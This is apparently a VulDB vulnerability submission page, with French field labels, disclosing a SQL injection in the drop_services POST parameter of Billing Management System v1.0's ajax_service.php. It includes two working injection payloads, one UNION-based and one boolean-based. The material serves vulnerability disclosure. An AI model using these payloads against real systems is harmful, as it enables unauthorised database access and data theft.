| Titre | Billing Management System v1.0 /smartbilling_source_code/ajax_service.php POST parameter 'drop_services' exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Billing Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /smartbilling_source_code/ajax_service.php POST parameter drop_services.
Payload1:drop_services=-1' union all select null,null,null,null,concat(0x616263,0x2526272829),null,null,null,null-- -
Payload2:drop_services=1' and 999=999 and 'h'='h |
|---|
| La source | ⚠️ https://github.com/Yastar/bug_report/blob/main/SQLi-1.md |
|---|
| Utilisateur | yastar (UID 46302) |
|---|
| Soumission | 09/05/2023 04:40 (il y a 3 ans) |
|---|
| Modérer | 09/05/2023 14:14 (10 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 228397 [SourceCodester Billing Management System 1.0 POST Parameter ajax_service.php drop_services injection SQL] |
|---|
| Points | 20 |
|---|